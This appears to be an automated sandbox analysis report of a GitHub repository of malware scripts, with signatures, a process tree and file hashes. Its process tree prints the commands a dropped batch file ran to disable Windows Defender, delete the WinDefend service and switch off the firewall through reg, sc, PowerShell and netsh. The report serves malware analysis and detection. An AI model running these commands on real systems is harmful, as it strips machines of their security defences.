Analysis

  • max time kernel
    127s
  • max time network
    128s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17/11/2024, 08:52

General

  • Target

    https://github.com/SantiagoPujana/MalwareScripts

Malware Config

Signatures

  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Stops running service(s) 4 TTPs
  • Executes dropped EXE 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 58 IoCs
  • Suspicious use of SendNotifyMessage 32 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com/SantiagoPujana/MalwareScripts
    1⤵
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3392
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x104,0x108,0x10c,0xd4,0x110,0x7ffafe10cc40,0x7ffafe10cc4c,0x7ffafe10cc58
      2⤵
        PID:2960
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2016,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2012 /prefetch:2
        2⤵
          PID:760
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1880,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2460 /prefetch:3
          2⤵
            PID:4500
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2144,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2572 /prefetch:8
            2⤵
              PID:2108
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3116,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3152 /prefetch:1
              2⤵
                PID:1088
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3132,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3208 /prefetch:1
                2⤵
                  PID:916
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4680,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3756 /prefetch:8
                  2⤵
                    PID:4412
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=4828,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4512 /prefetch:8
                    2⤵
                      PID:644
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=3868,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4868 /prefetch:8
                      2⤵
                        PID:4384
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=4936,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5408 /prefetch:8
                        2⤵
                          PID:4864
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5008,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5436 /prefetch:8
                          2⤵
                            PID:2640
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5248,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4980 /prefetch:8
                            2⤵
                              PID:3932
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5260,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5360 /prefetch:8
                              2⤵
                                PID:2016
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5300,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5104 /prefetch:8
                                2⤵
                                  PID:3612
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5104,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5140 /prefetch:1
                                  2⤵
                                    PID:1280
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=980,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3144 /prefetch:8
                                    2⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:2536
                                • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                  "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                  1⤵
                                    PID:532
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                    1⤵
                                      PID:2760
                                    • C:\Windows\System32\rundll32.exe
                                      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                      1⤵
                                        PID:1612
                                      • C:\Users\Admin\Desktop\ScreenMelter.exe
                                        "C:\Users\Admin\Desktop\ScreenMelter.exe"
                                        1⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        PID:4384
                                      • C:\Users\Admin\Desktop\FullMemory.exe
                                        "C:\Users\Admin\Desktop\FullMemory.exe"
                                        1⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        PID:992
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\win64.bat" "
                                        1⤵
                                          PID:396
                                          • C:\Windows\system32\reg.exe
                                            reg add HKLM\Software\Policies\Microsoft\WindowsDefender /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                            2⤵
                                            • Modifies registry key
                                            PID:1704
                                          • C:\Windows\system32\reg.exe
                                            reg add HKLM\Software\Policies\Microsoft\WindowsDefender /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
                                            2⤵
                                            • Modifies registry key
                                            PID:2392
                                          • C:\Windows\system32\reg.exe
                                            reg delete HKLM\SYSTEM\CurrentControlSet\Services\WinDefend\Security /f
                                            2⤵
                                            • Modifies registry key
                                            PID:3248
                                          • C:\Windows\system32\gpupdate.exe
                                            gpupdate /force
                                            2⤵
                                              PID:3180
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell.exe Restart-Service -Name WinDefend -Confirm:$false -Force
                                              2⤵
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:3752
                                            • C:\Windows\system32\sc.exe
                                              sc stop WinDefend
                                              2⤵
                                              • Launches sc.exe
                                              PID:4800
                                            • C:\Windows\system32\sc.exe
                                              sc query WinDefend
                                              2⤵
                                              • Launches sc.exe
                                              PID:2400
                                            • C:\Windows\system32\sc.exe
                                              sc delete WinDefend
                                              2⤵
                                              • Launches sc.exe
                                              PID:2480
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell.exe Set-NetFirewallProfile -Enabled False
                                              2⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:2596
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true
                                              2⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:1852
                                            • C:\Windows\system32\netsh.exe
                                              netsh advfirewall set allprofiles state off
                                              2⤵
                                              • Modifies Windows Firewall
                                              • Event Triggered Execution: Netsh Helper DLL
                                              PID:3692
                                            • C:\Windows\system32\netsh.exe
                                              netsh firewall set opmode mode=disable
                                              2⤵
                                              • Modifies Windows Firewall
                                              • Event Triggered Execution: Netsh Helper DLL
                                              PID:3456

                                          Network

                                                MITRE ATT&CK Enterprise v15

                                                Replay Monitor

                                                Loading Replay Monitor...

                                                Downloads

                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                                                  Filesize

                                                  649B

                                                  MD5

                                                  073d2d1f5afb5732236e939c0f259453

                                                  SHA1

                                                  8bf64fccb5a35df236f322ce95de1dd19a31a5a1

                                                  SHA256

                                                  c8e860634b94e4a52bdc84987fb8311deaf0d6704fad629b8ff553a1a511069e

                                                  SHA512

                                                  21dc80ce515562eeb520463a43e84b5e26a3604504091c47c5ee377c06afe9d71d732f6ed4f952682828a78e986819585156e5fdd7e20309739b001f1e1f2530

                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000019

                                                  Filesize

                                                  215KB

                                                  MD5

                                                  e579aca9a74ae76669750d8879e16bf3

                                                  SHA1

                                                  0b8f462b46ec2b2dbaa728bea79d611411bae752

                                                  SHA256

                                                  6e51c7866705bf0098febfaf05cf4652f96e69ac806c837bfb1199b6e21e6aaf

                                                  SHA512

                                                  df22f1dff74631bc14433499d1f61609de71e425410067fd08ec193d100b70d98672228906081c309a06bcba03c097ace885240a3ce71e0da4fdb8a022fc9640

                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                  Filesize

                                                  2KB

                                                  MD5

                                                  9bd40c38355785a81c6710b7e96decf6

                                                  SHA1

                                                  091fa9e4c17177a764ac1160984decb8d8e08bb8

                                                  SHA256

                                                  0c73b86d0ab84ef87e670c8f7b4a5334b42dae4a6ca813dcc2b1f0ae7148db39

                                                  SHA512

                                                  ff4768953b7eb3f6838bfc885dc578e6efa8bd4a04892e843b9b866dc1677d1861dff816b3b0294592e70bcb7493aa724c81584d9da8806fdb06879ea66114f3

                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                  Filesize

                                                  2KB

                                                  MD5

                                                  3bda54957329399e01369d366d01868b

                                                  SHA1

                                                  57b7c4ab48ee910bda91bab3d3ae3e938f0d0148

                                                  SHA256

                                                  c5cf894c14c37c6b34a9c32365767a53b73c1ad554664c980ffed693258b1757

                                                  SHA512

                                                  0221e125ee31169c12ad8dbaf27b3c09eabbb220a52c6ae8d332141c3f0223d037702dc058f582a86d92ba44819f9c25f18be7ae87f8b67dd5790a5ee6d79e20

                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                                  Filesize

                                                  2KB

                                                  MD5

                                                  d8d5b44fb839ede3d75feda67fa99c71

                                                  SHA1

                                                  4b633eee81202091940d2be98bfa1141bfc8754f

                                                  SHA256

                                                  e2c84b67be6e3a97126451d1d4073a8beb171b1df0df955e40a8a2c964c9f4f5

                                                  SHA512

                                                  6cc2d8ead16814a0828e4e52fbcbda4b2bed92805b68c4d07f7191fe292e34a514890a4e2e474f0c571a2cea65527c9e22eea0a863a0ccfe3aca556cefbe6641

                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                  Filesize

                                                  2B

                                                  MD5

                                                  d751713988987e9331980363e24189ce

                                                  SHA1

                                                  97d170e1550eee4afc0af065b78cda302a97674c

                                                  SHA256

                                                  4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                  SHA512

                                                  b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                  Filesize

                                                  1KB

                                                  MD5

                                                  3f79900a8ee54ebbc79263af85798e2c

                                                  SHA1

                                                  202f1eea059c97cef8e0b9ed4ee6ceb482d917e5

                                                  SHA256

                                                  8d25b64ce714dd9f63176b2f6b9c01397c76e2193a8df988bee10a1520972256

                                                  SHA512

                                                  fae8934040cdab50f89fce1afb54bc2e912efef0f8ad9a3729a4f6344f6685b765b3ea2a2cdbbde245bde4f32c49454af2bc2739f4e33045292abac7a864911b

                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                  Filesize

                                                  1KB

                                                  MD5

                                                  92d25c80f9e51b974164cf1cef8ff9ac

                                                  SHA1

                                                  edf7d0477c60b796fbe9bc6ea529730245a885d0

                                                  SHA256

                                                  1b989eeb235c944aa0d5faf07990ee47155d38e954a12d3ccbff34b6c83aba2b

                                                  SHA512

                                                  a74ccb4a283d48bbceab1f90dc59b800b9abd850ec6d5f5cea69c9c1e7b68086aa171bc018bec7e075e1f172f3b59e76611c3b0b4b504be3bc4e62e134927a7d

                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                  Filesize

                                                  1KB

                                                  MD5

                                                  68103ea7a4503dd93424400eb8cf6685

                                                  SHA1

                                                  828412d712bcfeeb940bb7482230b8d1a67f0e40

                                                  SHA256

                                                  db7fd66761785e06b5ff0b7815b16484ec47d55419ea9a44e9b60289bf1b19ee

                                                  SHA512

                                                  9ee3db3df3e73edd20faa9bca68c958db89bdb19ec4113d6388524dd16885452a66c46a769fdc3b3cd46d73287cc3ff88bc3475bae6febc68c2d5229edad8253

                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                  Filesize

                                                  1KB

                                                  MD5

                                                  21d3f83b943683f20d13b27b8555abbb

                                                  SHA1

                                                  3a0602b4b701ac3916abf990d1d48f754c87b75a

                                                  SHA256

                                                  8692a9c4971fdf97d106843159799f505cab152407a7d632c560eefa4c33e75a

                                                  SHA512

                                                  38197634ad5f4dda5d53d711ae2cdcf7fac7b6bb6c26e24dcf20790abde06c0dcff38ac3d332eed6c393d8cf311aa402d33f4e33072c81058a9b49b28f1910f0

                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                  Filesize

                                                  1KB

                                                  MD5

                                                  da190c584ad1b88fcd51f04685dd218c

                                                  SHA1

                                                  1b5d7c1d5cfd2806d39fb80ca97d8c71b24d65eb

                                                  SHA256

                                                  2ae4d64370bb0154a140b94f709bb3cb555cf08b40caa4ea4da3d0d7890df39b

                                                  SHA512

                                                  0cf93ce7ad4190152c62d2d8661bb25a3feb6cf314fc79d93561088a974c3febbdd61bb287a02c1b7a7cfafa031bcee550238b3e4b9ce7224f9ac38dbf3a7a08

                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                  Filesize

                                                  1KB

                                                  MD5

                                                  ba1d1bce374bf5d57dd33b02a9a13bf8

                                                  SHA1

                                                  47b8e855bb9e6b15f610240ff06e4bc9707780f0

                                                  SHA256

                                                  dc226f71609df0a7bec1ea2b4fbe5250205bddbac74a2e94684b5619b1c16348

                                                  SHA512

                                                  95b3b08818818c5c598e4ab52f913e13041b180e5e340993c9cae9391c368911064c3093fd743899206cd5a576b624ec116c27c170d5ca89a7217f4de656a865

                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                  Filesize

                                                  10KB

                                                  MD5

                                                  1dac7711129c58c4bb96f4ac5887e369

                                                  SHA1

                                                  3fe0460d5b525506a7b8c2220d7d2eef636ccb26

                                                  SHA256

                                                  04e7920e3bb85d8daf3f229eaa81637d37a12dd4be9df417c8f7967cd33e9d4f

                                                  SHA512

                                                  a4c420a4028288189b10f52dd6e7a2989668fabd0b3fe972ed918c263a5b2e83d0c43c0d03a3aa3bd0377b0cbc7344aa770ec7f2c7aae2d7040dfa4fac0dacaf

                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                  Filesize

                                                  10KB

                                                  MD5

                                                  0971dfb36bf506eb1e9e7d6f3d112c33

                                                  SHA1

                                                  bceed14aacb94e5b5018399beaf81491e11dcf1b

                                                  SHA256

                                                  dcb18bb8eef41072edd044a3dfc52764688246dba06b8d0fa6e9594fc05e9b0a

                                                  SHA512

                                                  c3f223f64b3af132cfb89505dee888186803c2cb4c09468c3093d69775dc217bece7f50ba7c93f779a5b95572311e7ee9933a7bdeb8566aad79f57446a1b1fc7

                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                  Filesize

                                                  10KB

                                                  MD5

                                                  1e0250b216bab7819e7880d2ba2e12a5

                                                  SHA1

                                                  ca991537aa702ce066f1154355852eb09c378233

                                                  SHA256

                                                  467583ce06284a410b1817659d6c040deb17d3d7fccdfcb4a8240ff2a888a6c1

                                                  SHA512

                                                  7bcd35237f43e3e828b63abd746d16e7f2934d8694ecdd6ef4c328799bdd84c9090576035515e8779d34c7d1b0bfff1f762db7367fb77ac50c9c00f220eb9f64

                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                  Filesize

                                                  9KB

                                                  MD5

                                                  a116308261e6dc9f7327354ce05586cd

                                                  SHA1

                                                  809e52db5a77a97ac22b31e37735034bdb1f77ae

                                                  SHA256

                                                  e847403fd8daaa42346ead0edcdccac58ef30a7c7b852770d9893ce39f4ed9d4

                                                  SHA512

                                                  eabb82f592c9dd5fdfb9e491adf3bc43fa377c246d0f946fc52fbf504554a34cc46557aeb4d252ad276f6a58e4e0eb13c7fdc905c82cda5e4ec1504d2320c2b1

                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                  Filesize

                                                  9KB

                                                  MD5

                                                  08729e18bf59e658dbaa0d544186224f

                                                  SHA1

                                                  d2331ab2f3c207aba283e9df002b2d763fbe0a6a

                                                  SHA256

                                                  fff4a524d7f867fda57816b557f75cd8f61f75d420fab691b7157f1b65d13816

                                                  SHA512

                                                  bf605e079029c97b8dd5403e772bcdd6c18a1325e1f3e77c4ec2bc8fe5145a538152f24d401893359dd52cea93bac3414f1cd82f85b875a5bb302b69adb4de6f

                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                  Filesize

                                                  10KB

                                                  MD5

                                                  b67b469a374cc80ddcfa5f2864784702

                                                  SHA1

                                                  ed1815c27a6fe6797bbbab1b8cbe7e8346c39676

                                                  SHA256

                                                  ea560c47f5aa8f56654119e3a71c5c2741ecdf61507b266dd7183689fbdbc9b0

                                                  SHA512

                                                  418786d01a82c496900d352b7a990e34aa6f9291308fcae874fef6783715a0d9328ecf6ce3e113fb33b2d19c784dc96b1abcc79499fa5584f4a3da0f2b6019ed

                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                  Filesize

                                                  10KB

                                                  MD5

                                                  8053ae6f03469e30b8f0113e3df74713

                                                  SHA1

                                                  0dbd621c49c94a39383e4e3b37b770e4b4bab5a1

                                                  SHA256

                                                  3fd3b3b5be01a87f706d5553018a3a8d0924d07cf7985b6f1b4a29d2ec807bc6

                                                  SHA512

                                                  3eacee11a07625bfb2eb84ee9428004a75cea7a54489c6afa2193012cd7dfe9aca02d37d48c1c4380796a4c821ebbebd97977115c52f63a2deb26d88ed4602a3

                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                  Filesize

                                                  10KB

                                                  MD5

                                                  134980c78a6b4244d50c265689cedca4

                                                  SHA1

                                                  18eeeca3de641d06aea7ca3d36eddace378f0d98

                                                  SHA256

                                                  f86d0a99b685555d4497a8819338a0c6884233cc38d68bbb41c930cf5babf9e5

                                                  SHA512

                                                  663158d971d2d4181da56678407a69437baab92c951822e58bab379f11b00cd698ab4939f6e047317168dcba64c809daa550e47b8c371abe2112dad9674030ae

                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                  Filesize

                                                  116KB

                                                  MD5

                                                  0dc35bc6ef8164a71cab703e6c8e5e2e

                                                  SHA1

                                                  e6c3b92acd95052fb1e4336ffa52521ffcdc80b3

                                                  SHA256

                                                  7ab722c4e93d69d0d0db6f54825cf3419c8cc5acea92f2266661152c96fd8087

                                                  SHA512

                                                  eecbb7648dd195b7099f813f91e39c29ad74818c239b292aeba9d113665e3b7f2491a2324c67a7e6899cd16046f39c16631dd2a6ae274e4f4626fa9c0e02798b

                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                  Filesize

                                                  116KB

                                                  MD5

                                                  d0e95cba9ed6ce304cb83116b75aed52

                                                  SHA1

                                                  a47d4c5624a7c25d358828f38320aa1b7207c388

                                                  SHA256

                                                  0c809780a7e58e9d0731d28b691bbda673536c3960f1e54c71352e425017e428

                                                  SHA512

                                                  b7de8a369c508aa355fd9d79c97c84625f5d10140dd62843dd86a377222a792e8fb38a7339732b8d39ff9d36f62f693767903e7ef6e675710587efe1699aef52

                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                  Filesize

                                                  3KB

                                                  MD5

                                                  92f89789864052cac0862ed6b4f1e706

                                                  SHA1

                                                  aa6594951427e103fa025c8ebef3ec5a5f85866c

                                                  SHA256

                                                  73123d6e562b26b1fd2cf4fece67930d95fc4738bad8d1f386345a5311274739

                                                  SHA512

                                                  71a0261ee6ffcd2e9bb336dde7110f80ac6fa01df5433e77cc170649b7936653d89229255fbeac15692e8736c9f3e5d15d62b2372865fe3d7ab933c511c2894e

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  1KB

                                                  MD5

                                                  7d28c7b63ed6134229fe24f4c4830521

                                                  SHA1

                                                  df820f1db7c236d72b47b54c68a16fbe942166da

                                                  SHA256

                                                  2adc156088f2d6759104e0f1b92d6c2acbb9f778d9d27f1d1e1e7341f274c68c

                                                  SHA512

                                                  c5602f04031381f9e8935496dff5c574c7d0a562d0ec8b01e26ee8bdc42068c823bc731f818a4c1c39968a0b648bebced9a31e0fd81e12c40d1026effba14e87

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  1KB

                                                  MD5

                                                  2200b65769051ec799e0541b887af28f

                                                  SHA1

                                                  34871de84f7c0e032b941dcac1bfb2b7704cf013

                                                  SHA256

                                                  88ad446bc5bc9ecc2ff23c1eccd3591056f57a41c3f6aa2eb7f4e826bfe4a82f

                                                  SHA512

                                                  fcaaf2d1e3b30c73f873d0e2671e93f0cf371cf7d0afc2d0c0dd6a6f1527666015a0bf89afff9ba849cc81c3d155a262fc6360fbdabaf76b0b6ee9d7eb6497ec

                                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yzkups4q.zwl.ps1

                                                  Filesize

                                                  60B

                                                  MD5

                                                  d17fe0a3f47be24a6453e9ef58c94641

                                                  SHA1

                                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                  SHA256

                                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                  SHA512

                                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                • C:\Users\Admin\Desktop\win64.bat

                                                  Filesize

                                                  5KB

                                                  MD5

                                                  2baf7f332b19d0a534fea218c84de722

                                                  SHA1

                                                  5b507b59151681f0be1b91679450413b97cb1baa

                                                  SHA256

                                                  15d7b954ce8ec43a28b4d9df7082e511d0bcecba6a19169d17d41a41ca8769f2

                                                  SHA512

                                                  09f84942cd8ca020364db5efe1fe61e7ca862d5bdada7568f0c8fadaa35c16632bb20c1fe946d1578c0b17728e442e1baf996ea2b6ac19ab1e3ed228662e13c2

                                                • C:\Users\Admin\Downloads\FullMemory.exe

                                                  Filesize

                                                  39KB

                                                  MD5

                                                  56dbd0fc7e98607b73306cf8551ba7d3

                                                  SHA1

                                                  7c3c297a08636cd94a5f4e61f5970f85beec53ab

                                                  SHA256

                                                  a489e7dc06ba4ef9572b66acfecf89c62d6b5c3d35b0ecb216aee2a4cd475498

                                                  SHA512

                                                  04be2153762e4a1ac20618d7a2980d7e92f4db7e951f9e754f30a4c2bf4f098443aafa2c8c9221584668d99a144869b30b7ef40c3acdb798cf2d6ddf0b6f2ed8

                                                • C:\Users\Admin\Downloads\ScreenMelter.exe

                                                  Filesize

                                                  41KB

                                                  MD5

                                                  cefcd3f182b98087ae20ce34a1f5989b

